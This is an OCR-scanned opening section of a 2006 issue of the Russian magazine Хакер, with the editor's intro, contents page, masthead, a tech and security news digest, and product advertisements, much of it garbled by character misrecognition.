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6 & Жизнь — сложная штука. Сейчас вот надо мной ноет 
наш литред Аня Большова и требует, чтобы я выдал ей инт- 
ро. Еще мы всей командой не спали уже хрен знает сколь- 
ко, ночью Лозовский кормил нас пельменями, потом я ви- 
дел прыгающих детей, а с утра нас атаковали огромные 
желтые комары с палец толщиной. 

Все это, конечно, неспроста, как ты догадался. Мы делали 
для тебя первый весенний номер сезона 2006. И мне бы 
очень хотелось, чтобы он вдохнул в тебя весенней свежес- 
ти и созидательного позитива. Чтобы ты оттаял после мо- 
розов и почувствовал: пришла весна наконец. Не кален- 
дарная, а настоящая. Теплая, солнечная, свежая. Когда хо- 
чется забить на все и просто отправится гулять по городу 
с друзьями, рассекать на роликах, пить пиво и заниматься 
всяческим развратом. 33 





ньюсы 

004 МедаИеѵѵз 



РЕВВБІМ 

018 Зажги по-быстрому 

РС_20ЫЕ 

028 Эксклюзивная видеотека 
034 Веселые картинки 
040 Виртуальная реальность 

ДИЗАЙН 

050 Уроки гимнастики 

ИМПЛАНТ 

054 Космическая одиссея 

ВЗЛОМ 

062 Наск-РАО 

064 Вечно жить не запретишь 
072 Побег из ѴМѴѴаге 
076 В гостях у прокурора 
082 Обзор эксплойтов 
084 Баги в цифрах 
086 ІІКВ.ЫеІ и не будет 
090 Х-конкурс 
092 Мегакухонный комбайн 
098 К кому уходят Аси? 

СЦЕНА 

102 Звезды хак-сцены 

104 Жизненный путь бездомного хакера 

108 Как хакают за бугром 

114 Интервью со студией "Антимульт" 

120 Почем опиум для народа? 

ШІХОЮ 

126 Молниеносная загрузка тукса 
130 Нарезаем трафик ломтиками 
134 Системный шпионаж 

кодинг 

142 Язык протектора 
146 Обезьяний кодинг 
148 Черная магия для начинающих 
152 Неслучайные баги 

КРЕАТИФФ 

156 Зрасе боі сот 

БІРЕЗТУБЕ 

162 Хэкерная правда 
164 Правила паркура 

юниты 

170 ѴѴѴѴѴѴ 
172 РАО 
176 Диско 
181 ШароѴѴАВЕХ 

189 е-таіі 

190 Хумор 



Фотограф: Владимир Бязров 
Стиль: Владимир Терченко 
Макияж: Ирина Пименова 
Прически: Игорь Ступников 

Модели: Мария Гречаная, Оксана Самуйлова, Екатерина 
Хонда, Лилия Багмут (все ѴѴогІсІ ЕазЫоп) 

Одежда для съемок предоставлена: 

ЕА/ЕЯС/Е 

0/Е5ЕГ 

модный дом ВОІІТОМ 

Благодарим за помощь в проведении съемки В-СІиЬ 




/РЕДАКЦИЯ 


РѴО/СО 


> Руководитель отдела 


/Оптовая продажа 


нию и средствам массовых 


>Главный редактор 


Степан «Зіер» Ильин 


рекламы цифровой группы 


> Директор отдела 


коммуникаций ПИ Я 77-11802 


Иван «СиТТег» Петров 


(зІер@геаІ.хакер.ш) 


Басова Ольга 


дистрибуции и маркетинга 


от 1 4 февраля 2002 г. 


(сийег @ геаі.хакер. ги) 


ВИДЕО ПО ВЗЛОМУ 


(оІда@ датеіапсі. ш) 


Владимир Смирнов 


Отпечатано в типографии 


>3амглавред 


Александр «ЗазЫкз» Любимов 


>Менеджеры отдела 


(ѵІабітіг@датеІап<±ги) 


«ЗсапѴѴеЬ», Финляндия 


Никита «Кіікііоз» Кислицин 


(зазІіікз@ геаі.хакер.ги) 


Емельянцева Ольга 


>Оптовое распространение 


Тираж 100 000 экземпляров. 


(пікіІ 02 @ геаі.хакер.ги) 


>Литературный редактор 


(оІдаетІ@ датеіапсі. ш) 


Степанов Андрей 


Цена договорная. 


>Выпускающий редактор 


Анна Большова 


Алехина Оксана 


(апб геу @ датеіапсі . ги) 




Александр «Ог.КІоипІ 2 »Лозовский 




(аІекйіпа@датеІап<±ги) 


>Связь с регионами 


Мнение редакции не обяза- 


(аІехапсіег@геаІ.хакер.ги) 


/АгТ 


Александр Белов 


Наседкин Андрей 


тельно совпадает с мнением 




>Арт-директор 


(ЬеІоѵ@ датеіапсі. ш) 


(пазес!кіп@ датеіапсі. ш) 


авторов. 


>Редакторы рубрик 


Константин Обухов 


Г орячева Евгения 


>Подписка 


Редакция уведомляет: все ма- 


ВЗЛОМ 


(оЬикМоѵ@ геаі.хакер.ги) 


(догуасМеѵа@датеІапсІ.ги) 


Попов Алексей 


териалы в номере предостав- 


Илья «ЗЫигтоѵік» Симонов 


>3амарт 


> Трафик менеджер 


(ророѵ @ датеіапсі. ги) 


ляются как информация 


(зМигтоѵік @ геаі .хакер, ги) 


Максим Спиваков 


Марья Алексеева 


тел.: (095)935.70.34 


к размышлению. 


РС_20ІЧЕ и ІІЫІТЗ 




(аіекзееѵа @ датеіапсі. ги) 


факс: (095) 780.88.24 


Лица, использующие данную 


Артем «ЬООЫік» Аникин 


/іІЧеІ 






информацию в противозакон- 


(ЬООЫ ік@геаІ.хакер.ги) 




/рцвизніыѳ 


> ГОРЯЧАЯ ЛИНИЯ 


ных целях, могут быть прив- 


СЦЕНА 


>ѴѴеЬВозз 


>Издатель 


ПО ПОДПИСКЕ 


лечены к ответственности. 


Олег «тіпбѵѵОгк» Чебенеев 


Скворцова Алена 


Сергей Покровский 


тел.: 8 (800) 200.3.999 


Редакция в этих случаях 


(тіпсіѵѵОгк@ геаі.хакер.ги) 


(А1уопа@ геаі.хакер.ги) 


(рокгоѵзку@ датеіапсі. ш) 


Бесплатно для звонящих 


ответственности не несет. 


ЦЫІХОЮ 


>Редактор сайта 


>Учредитель 


из России 




Андрей «АпбгизНоск» Матвеев 


Леонид Боголюбов 


ООО «Гейм Лэнд» 




Редакция не несет ответствен- 


(апс!гиз1юск@ геаі.хакер.ги) 


(ха @ геаі.хакер.ги) 


> Директор 


> ДЛЯ ПИСЕМ 


ности за содержание реклам- 


КОДИНГ 


/Реклама 


Дмитрий Агарунов 


101000, Москва, 


ных объявлений в номере. 


Николай «догі» Андреев 




(сітіігі @датеІапсІ.ги) 


Главпочтамт, а/я 652, Хакер 


За перепечатку наших матери- 


(догіит @ геаі.хакер.ги) 


>Директор по рекламе датеіапсі 


>Финансовый директор 


тада 2 іпе@ геаі.хакер.ги 


алов без спроса — преследуем. 


ИМПЛАНТ 


Игорь Пискунов 


Борис Скворцов 


Зарегистрировано в Министер- 




Юрий Свидиненко 


(ідог@датеІапсІ.ги) 


(Ьогіз@датеІап<±ги) 


стве Российской Федерации по 




(папоіп!о@таіІ.ги) 






делам печати, телерадиовеща- 






МІШѴѴОВК / МІШѴѴОЯК@ЯЕАІ_. ХАКЕР. ВЫ / 
ФЕДОР «ЕМ» ГАЛКОВ / ѴѴѴѴѴѴ.РСЮ2ЕМКА.ЫЕТ / 
СЕРГЕЙ НИКИТИН 




новостей 

одной 

строкой 



0. Днтихакерская поэзия В то время как в борьбе с хакерами другие компании судятся, улучшают защиту и страдают 
не пойми чем, Арріе Сотриіег Іпс. воспользовалась другим, более эффективным средством. Поэзией! Да, чувак, стихи 
нынче для хакеров, как «Ваій» для тараканов. Ты только вчитайся: Некий юзер страдал от того, / Что плохая ОС у него. / ОЗ 
X увидал / И ее он украл, / Но хардвар полетел у него. Подобные рифмоплетства Арріе включила в свою систему в качестве 
предупреждения хакерам, надеясь, что это их образумит. Вообще, после того как Арріе предпочла для своих маков процес- 
соры Іпіеі (раньше использовались процы от ІВМ), общая безопасность системы МасОЗ X, по мнению экспертов, снизилась. 
Что, понятное дело, привлекло немало хакеров. Пока неясно, насколько реально эффективной окажется стихотворная 
война, но сдается мне, гашиш сотрудники Арріе курят знатный. 0. Антихакерская музыка Пока Стив Джобс и компания 
пишут стихи, чтобы отпугнуть хакеров, ученые из Канадского Технологического Института им. Шеридана с той же целью 
пишут музыку. Идея профессора Уильяма Фаркаса основана на превращении информации о состоянии сервера в звуко- 
вой саундтрек, прослушивая который, админ будет в курсе всего. Дело в том, что современные системы контроля трафика 
требуют к себе особого внимания, поскольку задействуют левое полушарие мозга и отвлекают от работы. В то же время 
музыка в нашей голове взаимодействует с правым полушарием и нисколько не мешает в процессе работы. В представле- 
нии Фаркаса, админ сидит за компьютером, занимается своими делами, и все это время фоном звучит спокойная мелодия. 
Как только на серваке начинается подозрительная активность, анданте Бетховена превращается в грозовую симфонию 
Моцарта, а когда хакер, осмелев, переходит в атаку, раздается адский Рамштайн. Идея, правда, стара как мир. Такой спо- 
соб контроля был описан в книге Анатолия Ефремова «Туманности Андромеды», но до настоящего времени практического 
применения не имел. Сейчас в институте ведется разработка пилотной версии программы ІЗІС, которая поступит в продажу 
в ближайшем будущем. Ѳ. 10 тысяч баксов за новый баг в виндах Если ты отпетый хакер, способный взломать 
весь мир, но в кармане у тебя лишь мелочь, а в холодильнике лежит только засохшая сосиска, то тебе определенно стоит 
посетить сайт компании Юеіепзе. Она занимается исследованиями в области компьютерной безопасности и уже долгое 
время награждает тех, кто присылает ей инфу о новых уязвимостях в разном ПО. Сейчас компания организовала конкурс, 
участники которого могут заработать 10 тысяч долларов, если пришлют описание новой критической уязвимости в винде. 
Найдешь 2 — получишь 20 тысяч. Г лавное, чтобы они были действительно критическими, то есть, по определению МісгозоЙ, 
могли быть использованы червями для распространения без участия пользователя. Конкурс продлится до 31 марта 2006 
года, и количество наград неограниченно. Вообще, Юеіепзе каждый квартал выбирает новую «жертву» и предлагает 
хакерам найти в ней новые баги. За денежку, конечно. Так что теперь у взломщиков появился выбор: можно продавать 
собственные эксплойты на черном рынке, а можно легально зарабатывать на своем умении, участвуя в подобных хакерских 
соревнованиях. В. Нужны ли дыры Висте? Большой Брат все никак не унимается. И так уже держит всех под колпаком, 
но нет, мало ему. На протяжении прошлого месяца британские власти пытались убедить МісгозоН внедрить в ее будущий 
хит — ѴѴІпсІоѵѵз Ѵізіа — специальные лазейки, которые помогут при необходимости проникнуть правительственным хакерам 
на компьютер злоумышленника и собрать там компромат. Британцам показалось, что новая операционная система будет 
слишком безопасной, а это не есть хорошо. Мне только непонятно, как они собираются держать в секрете эти лазейки? 
Ведь как только Ѵізіа уйдет на «золото», ее тут же разберут по косточкам специалисты из разных стран, и лазейки эти станут 
достоянием общественности. Также неясно, что там с правовым аспектом. Ведь прослушивать телефонные линии органы 
могут только со специального разрешения, а как быть с ковырянием в чужих компьютерах? МісгозоН заявляет, что ее новая 
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система будет самой защищенной из всех, которые она когда-либо создавала, но от сотрудничества с властями не отказы- 
вается. 0. Хакер выводит из строя больничную сеть В феврале в городе Сиэтл началось судебное разбирательс- 
тво по делу 20-летнего жителя Калифорнии Кристофера Максвелла. Его обвиняют в создании бот-сети, ставшей причиной 
выхода из строя компьютерной сети одной из местных больниц. Бот-сеть состояла в основном из компьютеров разных 
университетов, а использовал ее хакер для предоставления рекламных услуг производителям ПО. За несколько месяцев 
работы Кристофер получил примерно 100 тысяч долларов. Но, когда из-за его трояна в отделении интенсивной терапии 
больницы Сиэтла вырубилась компьютерная аппаратура, а двери операционных оказались заблокированы, к расследова- 
нию подключилось ФБР. Вычислить негодяя им не составило большого труда. Так как проделки хакера могли привести к 
человеческим жертвам, наказание обещает быть серьезным. По крайней мере, обвинители настроены серьезно. 

В. Базовая афера В России, как тебе известно, можно купить все: от ядерных бомб до баз данных с самой разнообраз- 
ной конфиденциальной инфой. Но о бомбах мы сегодня говорить не будем, поговорим о базах... вернее, об одной из них, 
которая наделала немало шума на «базовом» рынке. Свежая база данных по проводкам из Центробанка была одной из 
самых ожидаемых и востребованных в начале 2005 года, поэтому цена на нее в первые дни доходила до $2000. Ее активно 
покупали и продавали на протяжении всего прошлого года, и к настоящему времени стоимость опустилась до 4000 рублей. 
Но напрасно жулики и коммерсанты радовались покупке. Недавно стало известно, что эта база данных липовая. Какой-то 
особо сообразительный программист просто написал прогу, которая по шаблону из старой аналогичной базы заполнила 
все графы таблицы (во многих случаях данные были абсолютно неправдоподобными), и, выдав ее за реальную, выпустил 
на рынок. Подвох заметили только год спустя, а Центробанк, газета «Ведомости» и Московский Совет Предпринимателей 
подтвердили, что это фальшивка. Стоит отдать должное аферистам — подделкой нелегальных баз данных не занимался 
еще никто, и парни заработали достаточно денег, чтобы в ближайшие годы не думать о работе. Вряд ли на них будут пода- 
ны заявления — кому охота признаваться в покупке нелегального товара? С другой стороны, стабильный рынок баз данных 
дал трещину, так как теперь никто не даст гарантии, что следующая выпущенная база с информацией о владельцах мобиль- 
ников, прописке и других вещах не окажется пустышкой. 9. Операция СуЬег Зіогт Если ты служил в армии, то навер- 
няка еще помнишь учения, которые там проводились. Где тебе с 40-килограммовым мешком на плечах, сжимая в зубах 
пулемет, приходилось переплывать реку, чтобы поставить в условленном месте флаг. Если не служил, то вспомни хотя бы 
учения, которые проводились в школе. Учитель кричал: «Пожар!», и дети бежали наружу, затаптывая друг друга. Так вот в 
начале февраля Департамент внутренней безопасности США решил тоже провести учения. Но не простые, а компьютер- 
ные. Путем соединения компьютеров Секретной Службы США с компьютерами правительства Канады, Австралии, Англии 
и крупных компаний (Місгозоіі, Сізсо и других) высокие чины воссоздали условный Интернет и стали экспериментировать 
с различными атаками на него. В результате условные хакеры условно напали на важнейшие узлы Сети, отключили элект- 
ричество в 10 американских штатах, вывели из строя системы онлайновых платежей, внедрили трояны в популярные про- 
граммы и системы, заюзапи самые критические уязвимости, какие только можно представить. И что ты подумал? Нет, дру- 
жище, мир не взорвался на триллион мелких атомов. Интернет выжил, и США в очередной раз поняли, что сильнее их нет 
никого. Официальной целью проводимых учений было исследование того, насколько защищена в целом инфраструктура 
Интернета от хакеров и какие последствия могут быть при массированных атаках. Полный доклад мы сможем лицезреть 
только летом, а пока у меня к властям США есть один вопрос: «Что произойдет, если, в отличие от учений, хакерские атаки 
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НЕСРАВНИМО МОЩНЕЕ! 



Высокая мощность компьютера Эксимер™ Ноте Мазіег Рго на базе процессора Іпіеі® Репііит® 4 640 с технологией НТ - 
это залог Вашей уверенности в себе перед самыми сложными и нестандартными задачами, которые нам готовит будущее. 




іллллл/.ехсітег.сот 



ѴѴеЬ: ѵѵѵѵѵѵ.ехсітег.сот/ііотетазіегрго 

Спрашивайте в магазинах Техносила и М. Видео 



Компания Эксимер рекомендует 
лицензионную ОС МісгозоЙ® ѴѴіпсІоѵѵз® ХР 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, Іпіеі, , Іпіеі Соге, Іпіеі Іодо, Іпіеі Іпзібе, Іпіеі Іпзісіе Іодо, Іпіеі ЗреебЗІер, ІпіеІ Ѵііѵ, Іпіеі Хеоп, Ііапіит, Напіит Іпзісіе, Соге Іпзібе, Репііит и Репііит 
Іпзібе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 







окажутся неожиданными? И придутся по тем местам, где вы меньше всего ожидали?». 0. ФБР накрыло сетевое МММ 
12сІаіІѵРго.сот не обещает тебе миллионы. Ты будешь получать только 12% от вложенных средств в обмен на просмотр 
рекламных сайтов, зато получать будешь ежедневно. Чем больше вложишь (минимум — 6$), тем больше будет твой еже- 
дневный доход. Звучит заманчиво? Еще как! Участниками этой сетевой пирамиды, организованной некой Чериз Джонсон, 
стали более 300 тысяч человек. А средний взнос от одного участника достигал 6 тысяч долларов. Пирамида некоторое 
время работала исправно и люди действительно получали деньги, вкладывая все больше и больше. А когда оборот достиг 
полутора миллиардов долларов, выплаты внезапно прекратились. Чериз удалось поиметь вкладчиков на сотни миллионов, 
еще столько же она выручила от рекламы. Помнишь условие пирамиды? 12баіІѵРго.сот считают крупнейшей финансовой 
пирамидой в истории человечества, а мисс Джонсон можно занести в книгу рекордов Гиннеса по скорости обогащения. 
Только вот вряд ли ей удастся потратить свои деньги. Подобный размах не мог остаться незамеченным, и к расследованию 
аферы подключилось ФБР. Вместе с 12баіІуРго, федералы прикрыли с десяток аналогичных, хоть и менее популярных 
пирамид. Пока дальнейшая судьба Чериз неизвестна. 0. Соодіе заменит флеш-карты и дискеты Если тебя надоело 
носиться к другу с флешками и дискетами, то новый сервис Соодіе как раз для тебя. Поисковая компания предлагает ска- 
чать со своего сайта программу Соодіе Оевкіор, с помощью которой ты сможешь удаленно искать информацию не только 
на своем компьютере, но и на компьютере своих друзей, знакомых, родственников... словом, всех, кто даст на это разре- 
шение. Правда, за удобство придется платить. Не деньгами — риском. Часть конфиденциальной информации юзера будет 
храниться на серверах Соодіе, так что если какой-то хакер вздумает взломать сеть компании, ты можешь оказаться в спис- 
ке жертв. Другим «НО» является то, что получив разрешение суда, органы могут воспользоваться этими архивами и узнать 
о тебе что-то нехорошее. Соодіе, конечно, утверждает, что ни в коем разе не намерена выдавать конфиденциальные све- 
дения властям, но можем ли мы верить ей? Решать тебе. Менеджер компании Сундар Пикаи обещает, что пользовательская 
информация не будет храниться на серверах более 30 дней. Дополнительной фишкой Соодіе Оезкіор является возмож- 
ность установить на рабочем столе небольшое окошко, периодически показывающее разную полезную инфу: прогноз 
погоды, новости, афиши, нужную рекламу и т.д. Более подробно ты можешь узнать о новом сервисе на Іійр://сІезк1ор.аооаІе . 
сот/ги . 00. Возмущение Красного креста Медики — тоже люди, иногда устают, скучают. Вот и в канадском «Красном 
Кресте» (организация, которая известна своим состраданием и оказанием помощи больным) ребятам скучно стало. Решили 
поскандалить по поводу использования их эмблемы в компьютерных играх. Красный крестик юзают сейчас все: от Мейера 
до Кармака. Найдя на стене виртуального подземелья ящик с красным значком, игрок может быть уверен, что здесь он 
может пополнить свои жизни, отдохнуть и, вообще, привести себя в порядок. Но представитель канадского филиала КК, 
Дэвид Прэтт, считает это кощунственным. В своем интервью газете ТНе Ѵапсоиѵег Зип он заявил, что использование сим- 
волики международной организации в видеоиграх подрывает ее авторитет. «А ведь Красный Крест, — продолжает Дэвид, 
— это признанный символ нейтралитета, безопасности и гуманизма.» В общем, символ гуманизма твердо решил судиться 
со всеми, кто будет рисовать в играх красный крестик. Хорошо хоть это нас, простых смертных, не касается. Я вчера крас- 
ным маркером нарисовал в блокнотике крестик — как бы не посадили. 00. Знакомьтесь, Бігес Когда на рынке появля- 
ется новая компания, то ей нужно чем-то зарекомендовать себя, чтобы бренд стал известен и популярен среди пользовате- 
лей, а устройства раскупались как горячие пирожки. Оігес производит очень привлекательные для молодежи устройства, 
так как основным их преимуществом является минимальная цена при максимуме возможностей. Сегодня на рынке есть два 
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Ваши способности. Наше вдохновение. 

МісгозоП 




Новый ѴізиаІ Біисііо 2005. Разница очевидна. 



Видите отличия? Как только вы начнете программировать, они сразу 
обнаружатся. Новый ѴізиаІ 5бисІіо® 2005 имеет 400 новых возможностей, 
дополнительные элементы управления для ѴѴеЬ и \Л/іпс1оѵѵ5®, заготовки кода, 
которые облегчают решение трудоемких задач и избавляют от рутины. 

В итоге, вы можете сосредоточиться на создании вашей программы. Найдите 
1 0 отличий и сыграйте в игру на тзсіп.тісгозо^бсот/ѵзІисІіо/сШегепсе 



МісгозоП* 

ѴізиаІ 51исІіо2005 



© 2006 МісгобоЙ: Согрогайоп. Все права защищены. Владельцем товарных знаков МісгозоЛ, ѴізиаІ Біисііо 2005, ѴізиаІ Біисііо, ѴѴіпсІоѵѵз, 
зарегистрированных на территории США и /или других стран, и владельцем авторских прав на их дизайн является корпорация Місго5оЛ. 






плѳѳра: Эігес МР6887 и 02500. Первый — это ЯазН-устройство, оснащенное 512 Мб памяти и экраном с диагональю 2,5 
дюйма. На нем можно просматривать фильмы и фотографии, а возможности диктофона, календаря и РМ-радио делают 
устройство действительно многофункциональным. Девайс имеет АѴ-вход, толщина корпуса составляет 18 мм. Второе уст- 
ройство интереснее. Этот плеер дисковый, но не думай, что это старье! Диски бывают разные, и наш герой способен вос- 
производить форматы ОѴЭ, Аибіо СЭ, ѴСЭ, МРЗ л 6РЕѲ, записанные на оптические диски ЭУЭ, СЭ-РОМ/Р/РѴѴ. Причем 
поддерживаются все эффекты, доступные для ОѴЭ-фильмов: замедленное и ускоренное воспроизведение, выбор вариан- 
тов субтитров, увеличение изображения. Для просмотра фильмов и фотографий на верхней крышке смонтирован 3,5” 
ЖК-экран. Также имеется композитный видеовыход и оптический цифровой аудиоинтерфейс для подключения к внешним 
устройствам. Устройство работает как от сети, так и от аккумуляторов или бортовой сети автомобиля, его размеры состав- 
ляют 26.6x1 8. 3x2. 8 см. 0Ѳ. 1 9 дюймов от АЗІІЗ Большой и качественный монитор сегодня — это не мечты, а реальность. 
В продаже их много, так что выбор есть: разные производители, разные характеристики, разные цены. Но если все это 
многообразие тебя не устраивает, то обрати свое внимание на новинку от компании АЗІІЗ — 19-дюймовый ЖК-экран 
РѴѴ191. Он оснащен фирменной технологией ЗРЕИОЮ, которая заметно увеличивает глубину и интенсивность цветов в 
реальном времени благодаря усовершенствованному алгоритму обработки элементов изображения. Интересной особен- 
ностью монитора является гарантия 2его ВгідИІ Эоі, по которой в течение трех лет тебе обменяют монитор в случае появле- 
ния на нем ярких точек. Технические характеристики устройства таковы: время отклика составляет 8 мс, контрастность — 
600:1, яркость — 330 кд/м2, входы ЭѴІ и Э-ЗІІВ, выход для наушников. Устройство соответствует стандарту Епегду Зіаг, а 
его габариты составляют 520x490x285 мм. 00. Новый звук от АѴЕ Компания АѴЕ, занимающаяся выпуском акустичес- 
ких систем, представила несколько новых продуктов, так что если ты вздумал обновить звуковую составляющую своего 
компьютера, то у тебя будет из чего выбрать. Системы ѴѴЕ-806 и ѴѴР-808 — это уровень Тор НІ-РІ. В наличии: массивный 
корпус с внутренними переборками и отделкой натуральным шпоном, разделительный фильтр, а также качественные драй- 
вера (диффузоры низкочастотного и среднечастотного динамиков изготовлены из бумаги с компаундовым покрытием, а 
купол твитера — тканевый). Так что с началом весны тебя может ожидать совершенно новое звучание! Комплект Э100 
представляет собой систему 2.0 с цифровым управлением, которое возможно как о кнопочной панели правого динамика, 
так и с пульта ДУ. Помимо тембрблока (регулировка высоких и низких частот) и функции балансировки каналов, есть мик- 
рофонный вход с регулируемым уровнем и цифровым эхо. 00. Возвращенная драгоценность Если ты сел за компью- 
тер не вчера и еще застал то время, когда процессоры маркировались числами 386 и 486, а Репііит был просто Репііит’ом, 
изредка с приставкой Рго или ММХ, но без всяких цифр, то ты наверняка помнишь компанию ЭіатопсІ МиІІІтебіа, выпускав- 
шую аудио и видеоплаты. Она исчезла с рынка, но пару лет назад вернулась на него, а сегодня представляет свое решение 
Ѵірег на основе чипа АН Вабеоп XI 600 Рго. Параметры платы таковы: частота ядра — 500 МГц, объем памяти — 256 Мб типа 
ОРР2 (в дальнейшем планируется выпуск моделей, оснащенных 512 Мб памяти), поддержка ОігесІХ 9.0 и ОрепСБ 2.0, рабо- 
та в связке с другой видеоплатой по технологии СгоззЕіге, разъемы ЭѴІ, ѴѲА, ТѴ-ОиІ/РЮТѴ и ѴІѴО. Интерфейс — РСІ Ехргезз, 
но будут выпущены платы и с АѲР. Так что если когда-то давно ты доверял этому бренду и любил его, то сейчас у тебя есть 
все шансы вернуться в прошлое. 00. Мобильные видеоплаты У тебя есть мобильный телефон? Думаю, что ответ будет 
утвердительным. А у твоих родителей, подруг и друзей? Скорее всего, тоже. Мобильников сейчас существует огромное 
количество, а планы компаний-производителей по выпуску новинок просто наполеоновские. Так что понять, какой это при- 
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МІСГОЗОІ І 




□ СЭКОНОМИТ ЛИ ЭТО НАМ ВРЕМЯ? 

□ БЫСТРО ЛИ ЭТО ПРИНЕСЕТ ВЫГОДУ? 

□ это шш? 

□ ИЛИ ѴѴШОѴѴ5 5ЕКѴЕК? 



© 2005 М іеговой Согрогаііоп. Все права защищены. Владел ьцемто варньіх знаков МісгозоЙ, ѴѴіпсІоѵѵз, 
ѴѴІпсіоѵѵз Зегѵег и ѴѴІпсіоѵѵз 5егѵег Бузіет, зарегистриро ванн ых на территории США и/или других стран, 
и владельцем авторских прав на их дизайн является корпорация МісгобоЙ. 

Другие названия компаний и продуктов, упомянутых в тексте, могут яршяться зарегистрированными 
товарными знаками соответствующих владельцев. 



еГ УЗНАЙТЕ ФАКТЫ 

КОМПАНИЯ ТОММУ НИРК5ЕК ОЖИДАЕТ, 

ЧТО ПЕРЕХОД С ПЛАТФОРМЫ КЕО НАТ ЫМЫХ 
НА ѴѴІИООѴѴ5 5ЕКѴЕК ПОЗВОЛИТ СОКРАТИТЬ 
ЗАТРАТЫ НА 25-30%. 

«Переход на ѴѴІпсіоѵѵз 5егѵег сократит наши затраты 
на ІТ-инфраструктуру приблизительно на 25-30 процентов, 
и это только начало. Наши усилия позволят повысить 
конкурентные преимущества компании. За шесть 
месяцев нам удалось разработать полноценный сайт 
электронной торговли - как раз к новогодним 
праздникам 2005 года. В будущем мы рассчитываем 
получить дополнительную прибыль за счет ускорения 
дизайн-разработок и оптимизации системы поставок». 

Эрик Синглтон, директор по информационным 
технологиям ТО М М У 3 НИНСЕК 

Подробнее об успехах наших партнеров - на сайте 
тісгоБоЛ.сот/гиБ/деНІтеТасІз 
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влѳкательный рынок — совсем несложно. Понимают это и в небезызвестной компании пѴісІіа, которая объявила о скором 
выпуске своих графических чипов (ЗоЕогсе для мобильных телефонов. Полное название устройства — пѴібіа ѲоРогсе 5500. 
Поддерживается разрешение 1024x768, цифровая камера с разрешением 10 мегапикселей, аппаратное декодирование 
видео и аудиофайлов и даже воспроизведение ЗО-звука. Технические характеристики чипа таковы: техпроцесс составляет 
90 нм, 200 МГц — частота ядра, шина памяти — 128 бит, 640 Кб — объем встроенной памяти (внешняя, в зависимости от 
модели, будет от 2 до 32 Мб), встроенный контроллер для карт памяти, размеры — 10x12x1 .4 мм. Так что скоро мобильный 
телефон сможет соперничать с приставками и компьютерами по части игр и прочих развлечений. Появятся мобилы на 
пѴібіа (ЗоРогсе в декабре этого года. 00. Ноутбук и 81.1 Ноутбуки всегда считались неким продуктом для деловых людей, 
которым они нужны исключительно для работы. И такое мнение сохраняется до сих пор, несмотря на выпуск мобильных 
компьютеров, явно предназначенных не только для составления скучных таблиц и диаграмм, а наоборот, оснащенных 
большими дисплеями, мощными видеоплатами и так далее, то есть прослеживается игровая направленность. Но дальше 
всех в этом направлении шагнула компания ѴѴІпбоѵѵзРС, которая уже прославилась недавним выпуском ноутбука с полно- 
ценным процессором АІѴЮ АІНІоп 64 Х2 4800ч- внутри. Но теперь ее инженеры решили пойти дальше и анонсировали уж 
вовсе чудо — ноутбук, который будет поддерживать технологию $1_І! Пока неизвестно, как это будет реализовано техноло- 
гически, а также сроки выхода устройства, зато есть информация, касающаяся конфигурации ѴѴІпсІоѵѵзРС $1іпд 919 (назва- 
ние этого ноута). Это процессор АІИІоп 64 Х2 4200ч- или 4800ч- Гб или 2 Гб оперативной памяти, графический адаптер пѴісІіа 
7800 СТХ, пара жестких дисков с интерфейсом ЗАТА, универсальный оптический привод, 1 9-дюймовый широкоформатный 
дисплей, а также адаптеры ѴѴІ-РІ и ВІиеІооІЬ. О системе охлаждения также ничего не сообщается. По цене данных нет, но 
можно смело предположить, что она составит сумму, на которую можно прикупить два неплохих десктопа. ОѲ. Бесшумные 
платы наступают Когда-то давно борьбой с перегревом компьютера занимались огромные вентиляторы, которые изда- 
вали соответствующий шум. Сегодня это уже не модно, наоборот, в почете бесшумные устройства, которые, конечно, не 
перегреваются. Их распространению хорошо поспособствовала технология ІИегтаІ ШЬе, на которой и основаны системы 
охлаждения двух новых графических плат от компании МЗІ, построенных на графических процессорах (ЗеРогсе 6600ѲТ и 
Вабеоп Х1600ХТ. Первая плата называется ІЧХ6600ѲТ-ТР256Е2, объем памяти (ЗРРРІЗ составляет 256 Мб, частота ядра — 
500 МГц, памяти — 1 ГГц, интерфейс подключения РСІ Ехргезз 16х. На плате установлены разъемы ѴѲА, РѴІ и ТѴ-оиі. 
Поклонники АН получат плату ВХ1600ХТ-Т2Р256Е2, с рабочей частотой ядра 600 МГц. Памяти — 256 Мб и того же типа 
(ѲРРВЗ), а вот частота у нее повыше — 1400 МГц. Интерфейс также РСІ Ехргезз 16х, имеются два порта РѴІ и выход ТѴ-оиі 
00. Настоящий шестисотый Иметь «шестисотый» — это всегда круто и престижно. Но сейчас речь пойдет не о маши- 
не, а о новой цифровой фотокамере Зопу СуЬег-ЗЬоІ 3600. Снимки, сделанные фотокамерой СуЬег-зИоІ 3600, имеют высо- 
кое разрешение благодаря преобразователю изображения Зопу Зирег НАР ССР с эффективным разрешением 6,0 
МедаріхеІ, который является центральным элементом этой фотокамеры, и Зх оптическому вариообъективу СагІ 2еізз Ѵагіо- 
Теззаг, который благодаря функции НідЬ Зепзіііѵііу, обеспечивающей высокую чувствительность, создает живое и резкое 
изображение объектов. Камера также имеет большой (5 см) ЖК-экран, используемый для просмотра сделанных кадров, 
мощную вспышку и функцию подавления шумов СІеаг ВАѴѴ ІМоізе Вебисііоп. Камера обладает 32 Мб встроенной памяти, 
поддерживает карточки Зопу Метогу Зііск Рио или Метогу Зііск Рго Рио, а соединение с ПК осуществляется по шине ІІЗВ 
2.0. Также поддерживается технология РісІВгісІде. 00. Реклама в космическом масштабе Что нужно сделать компа- 
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нии, чтобы ее офис или магазин заметили издалека? Естественно, 
развесить в округе гигантские плакаты с рекламой, само здание 
раскрасить в яркий цвет, добавить множество неоновых вывесок, 
мигающих лампочек и прочей пестрой мишуры. Вот только в 
большинстве случаев таким украшением подвергаются лишь 
стены здания, а крыша остается такой же серой и невзрачной, 
как и была. Ведь никому в здравом уме не придет в голову разгля- 
дывать постройку сверху... Однако так было лишь до недавнего 
времени. Миллионы людей теперь ориентируются по городу 
исключительно при помощи спутниковых снимков. Поэтому 
самые расторопные компании вовсю забеспокоились о том, как 
же вое-таки смотрится их здание с высоты спутникого полета, и, 
чтобы выделить свое строение из толпы окружающих, прибегнув 
к услугам маляров, уже разукрасили крыши фирменной символи- 
кой. Возможно, в скором времени идея получит продолжение и в 
пустынях наряду с рисунками, оставленными древними цивилиза- 
циями, появятся многокилометровые логотипы современных 
